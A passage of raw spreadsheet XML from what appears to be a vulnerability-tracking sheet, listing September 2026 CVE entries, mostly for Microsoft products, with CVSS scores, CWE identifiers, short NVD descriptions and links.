t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-47625</t></is></c></row><row r="721"><c r="A721" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B721" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C721" s="5" t="inlineStr"><is><t>CVE-2026-48888</t></is></c><c r="D721" s="5" t="n"><v>7.5</v></c><c r="E721" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F721" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G721" s="5" t="inlineStr" /><c r="H721" s="5" t="n"><v>0.003</v></c><c r="I721" s="5" t="inlineStr" /><c r="J721" s="5" t="inlineStr" /><c r="K721" s="5" t="inlineStr" /><c r="L721" s="5" t="inlineStr" /><c r="M721" s="5" t="inlineStr" /><c r="N721" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O721" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P721" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q721" s="5" t="inlineStr" /><c r="R721" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S721" s="5" t="inlineStr"><is><t>Allocation of Resources Without Limits or Throttling vulnerability in Automattic WooCommerce allows HTTP DoS.

This issue affects WooCommerce: from n/a before 11.1.0.</t></is></c><c r="T721" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-48888</t></is></c></row><row r="722"><c r="A722" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B722" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C722" s="5" t="inlineStr"><is><t>CVE-2026-57098</t></is></c><c r="D722" s="5" t="n"><v>7.5</v></c><c r="E722" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F722" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G722" s="5" t="inlineStr" /><c r="H722" s="5" t="n"><v>0.006</v></c><c r="I722" s="5" t="inlineStr" /><c r="J722" s="5" t="inlineStr" /><c r="K722" s="5" t="inlineStr"><is><t>microsoft:remote_desktop_client</t></is></c><c r="L722" s="5" t="inlineStr" /><c r="M722" s="5" t="inlineStr" /><c r="N722" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O722" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P722" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q722" s="5" t="inlineStr" /><c r="R722" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S722" s="5" t="inlineStr"><is><t>Improper verification of cryptographic signature in Windows RDP Client allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T722" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-57098</t></is></c></row><row r="723"><c r="A723" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B723" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C723" s="5" t="inlineStr"><is><t>CVE-2026-57099</t></is></c><c r="D723" s="5" t="n"><v>7.5</v></c><c r="E723" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F723" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G723" s="5" t="inlineStr" /><c r="H723" s="5" t="n"><v>0.008</v></c><c r="I723" s="5" t="inlineStr" /><c r="J723" s="5" t="inlineStr" /><c r="K723" s="5" t="inlineStr" /><c r="L723" s="5" t="inlineStr" /><c r="M723" s="5" t="inlineStr" /><c r="N723" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O723" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P723" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q723" s="5" t="inlineStr" /><c r="R723" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S723" s="5" t="inlineStr"><is><t>Allocation of resources without limits or throttling in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T723" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-57099</t></is></c></row><row r="724"><c r="A724" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B724" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C724" s="5" t="inlineStr"><is><t>CVE-2026-62759</t></is></c><c r="D724" s="5" t="n"><v>7.5</v></c><c r="E724" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F724" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G724" s="5" t="inlineStr" /><c r="H724" s="5" t="n"><v>0.003</v></c><c r="I724" s="5" t="inlineStr" /><c r="J724" s="5" t="inlineStr" /><c r="K724" s="5" t="inlineStr" /><c r="L724" s="5" t="inlineStr" /><c r="M724" s="5" t="inlineStr" /><c r="N724" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O724" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P724" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q724" s="5" t="inlineStr" /><c r="R724" s="5" t="inlineStr"><is><t>CWE-290</t></is></c><c r="S724" s="5" t="inlineStr"><is><t>Authentication bypass by spoofing in Windows Netlogon allows an unauthorized attacker to perform spoofing over an adjacent network.</t></is></c><c r="T724" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62759</t></is></c></row><row r="725"><c r="A725" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B725" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C725" s="5" t="inlineStr"><is><t>CVE-2026-62813</t></is></c><c r="D725" s="5" t="n"><v>7.5</v></c><c r="E725" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F725" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G725" s="5" t="inlineStr" /><c r="H725" s="5" t="n"><v>0.006</v></c><c r="I725" s="5" t="inlineStr" /><c r="J725" s="5" t="inlineStr" /><c r="K725" s="5" t="inlineStr" /><c r="L725" s="5" t="inlineStr" /><c r="M725" s="5" t="inlineStr" /><c r="N725" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O725" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P725" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q725" s="5" t="inlineStr" /><c r="R725" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S725" s="5" t="inlineStr"><is><t>Use after free in Active Directory Domain Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T725" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62813</t></is></c></row><row r="726"><c r="A726" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B726" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C726" s="5" t="inlineStr"><is><t>CVE-2026-66304</t></is></c><c r="D726" s="5" t="n"><v>7.5</v></c><c r="E726" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F726" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G726" s="5" t="inlineStr" /><c r="H726" s="5" t="n"><v>0.007</v></c><c r="I726" s="5" t="inlineStr" /><c r="J726" s="5" t="inlineStr" /><c r="K726" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L726" s="5" t="inlineStr" /><c r="M726" s="5" t="inlineStr" /><c r="N726" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O726" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P726" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q726" s="5" t="inlineStr" /><c r="R726" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S726" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Skype for Business allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T726" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66304</t></is></c></row><row r="727"><c r="A727" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B727" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C727" s="5" t="inlineStr"><is><t>CVE-2026-66307</t></is></c><c r="D727" s="5" t="n"><v>7.5</v></c><c r="E727" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F727" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G727" s="5" t="inlineStr" /><c r="H727" s="5" t="n"><v>0.006</v></c><c r="I727" s="5" t="inlineStr" /><c r="J727" s="5" t="inlineStr" /><c r="K727" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L727" s="5" t="inlineStr" /><c r="M727" s="5" t="inlineStr" /><c r="N727" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O727" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P727" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q727" s="5" t="inlineStr" /><c r="R727" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S727" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Skype for Business allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T727" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66307</t></is></c></row><row r="728"><c r="A728" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B728" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C728" s="5" t="inlineStr"><is><t>CVE-2026-67376</t></is></c><c r="D728" s="5" t="n"><v>7.5</v></c><c r="E728" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F728" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G728" s="5" t="inlineStr" /><c r="H728" s="5" t="n"><v>0.008</v></c><c r="I728" s="5" t="inlineStr" /><c r="J728" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K728" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L728" s="5" t="inlineStr" /><c r="M728" s="5" t="inlineStr" /><c r="N728" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O728" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P728" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q728" s="5" t="inlineStr" /><c r="R728" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S728" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T728" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67376</t></is></c></row><row r="729"><c r="A729" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B729" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C729" s="5" t="inlineStr"><is><t>CVE-2026-68887</t></is></c><c r="D729" s="5" t="n"><v>7.5</v></c><c r="E729" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F729" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G729" s="5" t="inlineStr" /><c r="H729" s="5" t="n"><v>0.008</v></c><c r="I729" s="5" t="inlineStr" /><c r="J729" s="5" t="inlineStr" /><c r="K729" s="5" t="inlineStr" /><c r="L729" s="5" t="inlineStr" /><c r="M729" s="5" t="inlineStr" /><c r="N729" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O729" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P729" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q729" s="5" t="inlineStr" /><c r="R729" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S729" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Message Queuing Queue Manager allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T729" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68887</t></is></c></row><row r="730"><c r="A730" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B730" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C730" s="5" t="inlineStr"><is><t>CVE-2026-69329</t></is></c><c r="D730" s="5" t="n"><v>7.5</v></c><c r="E730" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F730" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G730" s="5" t="inlineStr" /><c r="H730" s="5" t="n"><v>0.011</v></c><c r="I730" s="5" t="inlineStr" /><c r="J730" s="5" t="inlineStr" /><c r="K730" s="5" t="inlineStr" /><c r="L730" s="5" t="inlineStr" /><c r="M730" s="5" t="inlineStr" /><c r="N730" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O730" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P730" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q730" s="5" t="inlineStr" /><c r="R730" s="5" t="inlineStr"><is><t>CWE-125, CWE-190</t></is></c><c r="S730" s="5" t="inlineStr"><is><t>Out-of-bounds read in BranchCache allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T730" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69329</t></is></c></row><row r="731"><c r="A731" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B731" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C731" s="5" t="inlineStr"><is><t>CVE-2026-69342</t></is></c><c r="D731" s="5" t="n"><v>7.5</v></c><c r="E731" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F731" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G731" s="5" t="inlineStr" /><c r="H731" s="5" t="n"><v>0.011</v></c><c r="I731" s="5" t="inlineStr" /><c r="J731" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K731" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L731" s="5" t="inlineStr" /><c r="M731" s="5" t="inlineStr" /><c r="N731" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O731" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P731" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q731" s="5" t="inlineStr" /><c r="R731" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S731" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T731" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69342</t></is></c></row><row r="732"><c r="A732" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B732" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C732" s="5" t="inlineStr"><is><t>CVE-2026-69378</t></is></c><c r="D732" s="5" t="n"><v>7.5</v></c><c r="E732" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F732" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G732" s="5" t="inlineStr" /><c r="H732" s="5" t="n"><v>0.011</v></c><c r="I732" s="5" t="inlineStr" /><c r="J732" s="5" t="inlineStr" /><c r="K732" s="5" t="inlineStr" /><c r="L732" s="5" t="inlineStr" /><c r="M732" s="5" t="inlineStr" /><c r="N732" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O732" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P732" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q732" s="5" t="inlineStr" /><c r="R732" s="5" t="inlineStr"><is><t>CWE-674</t></is></c><c r="S732" s="5" t="inlineStr"><is><t>Uncontrolled recursion in Microsoft Exchange Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T732" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69378</t></is></c></row><row r="733"><c r="A733" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B733" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C733" s="5" t="inlineStr"><is><t>CVE-2026-69397</t></is></c><c r="D733" s="5" t="n"><v>7.5</v></c><c r="E733" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F733" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G733" s="5" t="inlineStr" /><c r="H733" s="5" t="n"><v>0.006</v></c><c r="I733" s="5" t="inlineStr" /><c r="J733" s="5" t="inlineStr"><is><t>openssh</t></is></c><c r="K733" s="5" t="inlineStr" /><c r="L733" s="5" t="inlineStr" /><c r="M733" s="5" t="inlineStr" /><c r="N733" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O733" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P733" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q733" s="5" t="inlineStr" /><c r="R733" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S733" s="5" t="inlineStr"><is><t>Use after free in OpenSSH for Windows allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T733" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69397</t></is></c></row><row r="734"><c r="A734" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B734" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C734" s="5" t="inlineStr"><is><t>CVE-2026-69428</t></is></c><c r="D734" s="5" t="n"><v>7.5</v></c><c r="E734" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F734" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G734" s="5" t="inlineStr" /><c r="H734" s="5" t="n"><v>0.011</v></c><c r="I734" s="5" t="inlineStr" /><c r="J734" s="5" t="inlineStr" /><c r="K734" s="5" t="inlineStr" /><c r="L734" s="5" t="inlineStr" /><c r="M734" s="5" t="inlineStr" /><c r="N734" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O734" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P734" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q734" s="5" t="inlineStr" /><c r="R734" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S734" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T734" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69428</t></is></c></row><row r="735"><c r="A735" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B735" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C735" s="5" t="inlineStr"><is><t>CVE-2026-69429</t></is></c><c r="D735" s="5" t="n"><v>7.5</v></c><c r="E735" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F735" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G735" s="5" t="inlineStr" /><c r="H735" s="5" t="n"><v>0.006</v></c><c r="I735" s="5" t="inlineStr" /><c r="J735" s="5" t="inlineStr" /><c r="K735" s="5" t="inlineStr" /><c r="L735" s="5" t="inlineStr" /><c r="M735" s="5" t="inlineStr" /><c r="N735" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O735" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P735" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q735" s="5" t="inlineStr" /><c r="R735" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S735" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows IKE Extension allows an authorized attacker to execute code over a network.</t></is></c><c r="T735" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69429</t></is></c></row><row r="736"><c r="A736" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B736" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C736" s="5" t="inlineStr"><is><t>CVE-2026-69443</t></is></c><c r="D736" s="5" t="n"><v>7.5</v></c><c r="E736" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F736" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G736" s="5" t="inlineStr" /><c r="H736" s="5" t="n"><v>0.01</v></c><c r="I736" s="5" t="inlineStr" /><c r="J736" s="5" t="inlineStr" /><c r="K736" s="5" t="inlineStr" /><c r="L736" s="5" t="inlineStr" /><c r="M736" s="5" t="inlineStr" /><c r="N736" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O736" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P736" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q736" s="5" t="inlineStr" /><c r="R736" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S736" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Device Health Attestation (DHA) allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T736" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69443</t></is></c></row><row r="737"><c r="A737" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B737" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C737" s="5" t="inlineStr"><is><t>CVE-2026-69514</t></is></c><c r="D737" s="5" t="n"><v>7.5</v></c><c r="E737" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F737" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G737" s="5" t="inlineStr" /><c r="H737" s="5" t="n"><v>0.007</v></c><c r="I737" s="5" t="inlineStr" /><c r="J737" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K7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7" s="5" t="inlineStr" /><c r="M737" s="5" t="inlineStr" /><c r="N737" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O737" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P737" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q737" s="5" t="inlineStr" /><c r="R737" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S737" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T737" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69514</t></is></c></row><row r="738"><c r="A738" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B738" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C738" s="5" t="inlineStr"><is><t>CVE-2026-69539</t></is></c><c r="D738" s="5" t="n"><v>7.5</v></c><c r="E738" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F738" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G738" s="5" t="inlineStr" /><c r="H738" s="5" t="n"><v>0.005</v></c><c r="I738" s="5" t="inlineStr" /><c r="J738" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K7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8" s="5" t="inlineStr" /><c r="M738" s="5" t="inlineStr" /><c r="N738" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O738" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P738" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q738" s="5" t="inlineStr" /><c r="R738" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S738" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T738" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69539</t></is></c></row><row r="739"><c r="A739" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B739" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C739" s="5" t="inlineStr"><is><t>CVE-2026-69587</t></is></c><c r="D739" s="5" t="n"><v>7.5</v></c><c r="E739" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F739" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G739" s="5" t="inlineStr" /><c r="H739" s="5" t="n"><v>0.012</v></c><c r="I739" s="5" t="inlineStr" /><c r="J739" s="5" t="inlineStr" /><c r="K739" s="5" t="inlineStr" /><c r="L739" s="5" t="inlineStr" /><c r="M739" s="5" t="inlineStr" /><c r="N739" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O739" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P739" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q739" s="5" t="inlineStr" /><c r="R739" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S739" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T739" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69587</t></is></c></row><row r="740"><c r="A740" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B740" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C740" s="5" t="inlineStr"><is><t>CVE-2026-69588</t></is></c><c r="D740" s="5" t="n"><v>7.5</v></c><c r="E740" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F740" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G740" s="5" t="inlineStr" /><c r="H740" s="5" t="n"><v>0.012</v></c><c r="I740" s="5" t="inlineStr" /><c r="J740" s="5" t="inlineStr" /><c r="K740" s="5" t="inlineStr" /><c r="L740" s="5" t="inlineStr" /><c r="M740" s="5" t="inlineStr" /><c r="N740" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O740" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P740" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q740" s="5" t="inlineStr" /><c r="R740" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S740" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows TCP/IP allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T740" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69588</t></is></c></row><row r="741"><c r="A741" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B741" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C741" s="5" t="inlineStr"><is><t>CVE-2026-69599</t></is></c><c r="D741" s="5" t="n"><v>7.5</v></c><c r="E741" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F741" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G741" s="5" t="inlineStr" /><c r="H741" s="5" t="n"><v>0.007</v></c><c r="I741" s="5" t="inlineStr" /><c r="J741" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K741" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L741" s="5" t="inlineStr" /><c r="M741" s="5" t="inlineStr" /><c r="N741" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O741" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P741" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q741" s="5" t="inlineStr" /><c r="R741" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S741" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T741" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69599</t></is></c></row><row r="742"><c r="A742" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B742" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C742" s="5" t="inlineStr"><is><t>CVE-2026-69607</t></is></c><c r="D742" s="5" t="n"><v>7.5</v></c><c r="E742" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F742" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G742" s="5" t="inlineStr" /><c r="H742" s="5" t="n"><v>0.006</v></c><c r="I742" s="5" t="inlineStr" /><c r="J742" s="5" t="inlineStr" /><c r="K742" s="5" t="inlineStr" /><c r="L742" s="5" t="inlineStr" /><c r="M742" s="5" t="inlineStr" /><c r="N742" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O742" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P742" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q742" s="5" t="inlineStr" /><c r="R742" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S742" s="5" t="inlineStr"><is><t>Use after free in Windows Deployment Services allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T742" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69607</t></is></c></row><row r="743"><c r="A743" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B743" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C743" s="5" t="inlineStr"><is><t>CVE-2026-69631</t></is></c><c r="D743" s="5" t="n"><v>7.5</v></c><c r="E743" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F743" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G743" s="5" t="inlineStr" /><c r="H743" s="5" t="n"><v>0.012</v></c><c r="I743" s="5" 